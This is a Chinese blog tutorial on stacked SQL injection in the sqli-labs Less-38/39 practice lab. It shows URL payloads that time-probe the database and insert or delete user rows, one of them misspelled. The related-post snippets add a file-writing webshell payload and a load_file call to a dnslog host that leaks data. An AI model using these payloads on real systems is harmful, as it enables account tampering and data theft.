堆叠注入&Sqli-labs Less38\39

最新推荐文章于 2024-07-11 20:53:08 发布
最新推荐文章于 2024-07-11 20:53:08 发布
阅读量181 收藏 1
点赞数
分类专栏: SQL注入 sqli-labs 文章标签: 信息安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44925883/article/details/116277064
版权
本文详细介绍了SQL堆叠注入的概念,它允许在单个请求中执行多个数据库语句,包括插入、更新和删除操作,这比联合查询更具危害性。堆叠注入与联合查询的主要区别在于其能执行更广泛的SQL命令。尽管使用条件有限,但一旦成功利用,可能导致严重安全问题,如非法用户创建、删除。示例展示了如何利用堆叠注入在特定场景下添加、删除数据库用户,强调了防范此类攻击的重要性。
摘要由CSDN通过智能技术生成

堆叠查询注入

堆叠注入即在语句后加分号;结束一个sql语句后继续构造第二个语句从而达到一起执行的目的。

和联合查询的区别

联合查询的语句类型的有限的,只能执行查询语句,而堆叠注入可以执行任意的语句——union后只能跟select,而堆叠后面可以使用insert,update,create,delete等常规数据库语句。
堆叠注入的使用条件比较有限,而且可能会受到API或者数据库引擎的限制,但一旦能够被使用危险很大。

PDO通常可以执行多语句但无法直接得到注入结果,即只返回第一条语句的结果,所以在分号后往往采用时间盲注或者update更新数据。

http://192.168.43.61/web/sql/duidie.php?id=1;select if(ascii(substr(database(),1,1))=116,sleep(5),1)

还可以使用堆叠注入来实现直接对数据库进行增删用户从而达到绕过验证的目的,这是联合注入无法达到的,如less 38/39

http://127.0.0.1/sqli-labs/less-38/?id=1;insetr%20into%20usrs(id,username,password)%20values(%27100%27,%27qqqq%27,%2712333%27)--+

增加用户

http://127.0.0.1/sqli/Less-39/?id=1;insert%20into%20users(id,username,password)valu
es(200,%27abcd%27,%2712334334%27)--+

删除用户

http://127.0.0.1/sqli/Less-39/?id=200;delete%20from%20users%20where%20id=100--+
信安小菜鸡
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【合天网安】SQLi-Labs系列之堆叠注入
hehigoxqc606的博客
09-02 352
概念: Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆SQL语句(多条)一起执行。而在真实的运用中也是这样的,在mysql中,主要是命令行中,每一条语句结尾加分号;来表示语句结束。 堆叠注入使用条件 堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysql_multi_query()函数,其只能执行一条语句,分号后面的内容将不会被执行。 任务一:基于GET型的堆叠注..
sqli-labs Less-50、51、52、53(sqli-labs闯关指南 50、51、52、53)— orderby stacked injection
m0_54899775的博客
12-28 712
sqli-labs Less-50、51、52、53(sqli-labs闯关指南 50、51、52、53)— orderby stacked injection
sql注入 - 堆叠注入
wcy19990628的博客
02-10 330
5、堆叠(多语句)注入 http://localhost/sqli-labs-master/Less-38/?id=-1'; select "<?php phpinfo();?>" into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\aaaaaaaaqq.php" ;-- 在php连接mysql注入中用到了musqli_multi_query...
sql注入堆叠注入
最新发布
m0_52484587的博客
07-11 300
堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。在我们的web系统中,因为代码通常只返回一个查询结果,因此,堆叠注入第二个语句产生错误或者结果只能被忽略,我们在前端界面是无法看到返回结果的。同时在使用堆叠注入之前,我们也是需要知道一些数据库相关信息的,例如表名,列名等信息。区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。
Sqli-labs 复习 Less38-45 堆叠注入
kevinhanser
08-12 998
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 堆叠注入 原理简介 堆叠注入简介 Stacked injections: 堆叠注入。从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样...
Sqli-labs Less38-45 堆叠注入
kevinhanser
08-10 705
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 38: GET- Stacked Query Injection - String 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 测试 http://10.10.10.137/sqli-labs/Less-38/?id=...
sql注入-堆叠注入】多语句执行、结合其他注入
07-12 4975
堆叠注入】相比其他注入能执行的操作更多
sqli-labs Less-3839、40、41、42、43、44、45(sqli-labs闯关指南 3839、40、41、42、43、44、45)—堆叠注入
m0_54899775的博客
12-27 1077
sqli-labs Less-3839、40、41、42、43、44、45(sqli-labs闯关指南 3839、40、41、42、43、44、45)—堆叠注入
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1681
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs(38-53)
qq_43395215的博客
08-26 882
文章目录第38关:第39关:第40关:第41关:第42关:第43关:第44关:第45关:第46关:第47关:第48关:第49关:第50关:第51关:第52关:第53关: 第38关: 这一关挺简单的,就一个闭合判断,就可爆数据,但是,这一关的目的不是查询数据,而是通过堆叠注入,对数据库执行操作 堆叠注入,就是利用sql中“;”是标志一句话结束,我们可以通过“;”将多个语句写入到sql语句中,这里的语句就不仅仅是指查询,还有增删查改 闭合判断: /Less-38/?id=1' and 1=1 --+ sql
sqli-labs(十五)(堆叠注入)
weixin_30407099的博客
09-04 269
第三十八关: 后面好几关都是堆叠注入。简单介绍下: Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。 在SQL中,分号(;)是用来表示一条s...
sqli-labs-堆叠注入(stacked injections)
weixin_47346400的博客
02-26 316
堆叠注入的原理传送门
sql注入——堆叠注入
cxrpty的博客
02-10 466
堆叠注入即多语句注入,多条语句用;隔开 以sql labs38为例 1.在dnslog上获取 2.在sql labs38上输入多条语句: http://localhost/sqli-labs-master/Less-38/?id=1'; select load_file("\\\\9shl7n.dnslog.cn\\dsfs"); -- - 3.可看到在dnslog上执行成功 ...
SQL注入-07】堆叠注入案例—以sqli-labs-less38为例
m0_64378913的博客
05-05 975
目录1 堆叠注入概述1.1 定义1.2 与union联合查询注入的对比1.3 局限性2 堆叠注入案例—以sqli-labs-less38为例2.1 实验平台2.2 实验目标2.3 堆叠注入实验步骤2.3.1 注入前准备2.3.2 判断注入点及注入类型2.3.3 判断回显列数及回显位置2.3.4 union注入获取库名表名字段名2.3.5 堆叠注入3 总结参考文章 1 堆叠注入概述 1.1 定义 英文为 stacked injection。 在SQL数据库中,每条语句是以;分开的,堆叠注入就是一次性注入并执
sqli-labs通关全解----堆叠注入---38~45---11
cyynid的博客
01-13 459
本文引入一个新的概念:堆叠注入Stackedinjections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在;结束一个sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入
sqli-labs (less-39)
kukudeshuo的博客
03-14 236
sqli-labs (less-39) 输入id=1 http://127.0.0.1/sql1/Less-39/?id=1' 根据错误显示判断为数字型注入 这里我们就不讲使用union注入的方法,前面的关卡讲了很多union注入的方法,我们直接使用堆叠注入攻击 创建一个表 http://127.0.0.1/sql1/Less-39/?id=1;create table test like users;--+ 创建一个新用户 http://127.0.0.1/sql1/Less-39/?id=1;
[强网杯 2019]随便注1
weixin_59453707的博客
07-21 443
1.什么是堆叠注入堆叠注入就是利用sql命令中利用“;”来做一句sql命令的结束标志,但是在“;”后的同一行里添加其他sql命令仍可以执行。 2.堆叠注入与union injection(联合注入)之间的区别? 区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。 3.堆叠注入的局限性? 堆叠注入并不是在每种情况下都能使用的。大多数时候,因为API或数据库引擎的不支持,堆叠注入都无法实现。 打开靶机,...
SQL注入详解(上)
weixin_59571952的博客
11-29 4812
一:SQL注入漏洞介绍 SQL注入攻击包括通过输入数据从客户端插入或注入SQL查询到应用程序,一个成功的SQL注入攻击可以从数据库中获取敏感数据,修改数据库数据,执行数据库管理操作,在某些情况下能对操作系统发布命令,SQL注入攻击是一种注入攻击,它将SQL命令注入到数据层输入,从而影响执行预定义的SQL命令,由于用户的输入,也是SQL语句的一部分,所以攻击者可以利用这部分可以控制的内容,注入自己定义的语句,改变SQL语句执行逻辑,让数据库执行任意自己需要的指令 二:修复建议 1:所...
利用布尔注入SQLi-Labs less16实战脚本
本文档详细介绍了如何结合手工注入的方法编写一个针对SQL盲注的脚本,以SQLi-Labs的Less16环境为例。首先,作者通过抓包技术来分析测试注入点,观察响应数据包的变化,利用"1&#39;)or1=1--#"这种经典的布尔型SQL注入手法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值